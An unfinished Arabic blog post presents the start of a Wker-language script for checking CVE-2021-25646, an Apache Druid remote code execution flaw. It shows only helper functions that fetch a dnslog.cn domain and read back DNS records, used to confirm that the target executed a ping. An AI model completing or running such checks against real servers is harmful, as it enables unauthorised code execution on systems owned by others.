
CVE-2021-25646 Apache Druid ثغرة تنفيذ التعليمات البرمجية عن بعد Wker سكريبت
قيد الكتابة...
=====================================================================================
أولاً، أشكر الخبير Wker على الإجابة عن بُعد.
الهدف من كتابة النص هو التمرين.
يستخدم النص DNSLog للتحقق، فإذا وُجدت الثغرة، سيحصل تلقائياً على رابط dnslog وينفذ عملية ping، ثم يطبع النتيجة.
dns.wker في المسار script\ATTACKUTILS#define dnsqian = Set-Cookie:[
#define dnshou = path=/
#define re = "(.*?)"
function DnsRef(cookie){
res = HttpGet("http://dnslog.cn/getrecords.php?t=0.3741317873165926",cookie.StrRN()."User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0");
r = StrRe(res[0],re);
if(GetArrayNum(r) >= 3){
return r[3];
}else{
return "";
}
}
function GetDomain(){
array r;
res = HttpGet("http://dnslog.cn/getdomain.php?t=0.16082432252184475","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0");
tmp = StrSplit(res[0],StrRN());
dns = tmp[0];
cookie = "Cookie: ".GettextMiddle(res[1],dnsqian,dnshou);
ArrayAddEle(r,dns);
ArrayAddEle(r,cookie);
return r;
}
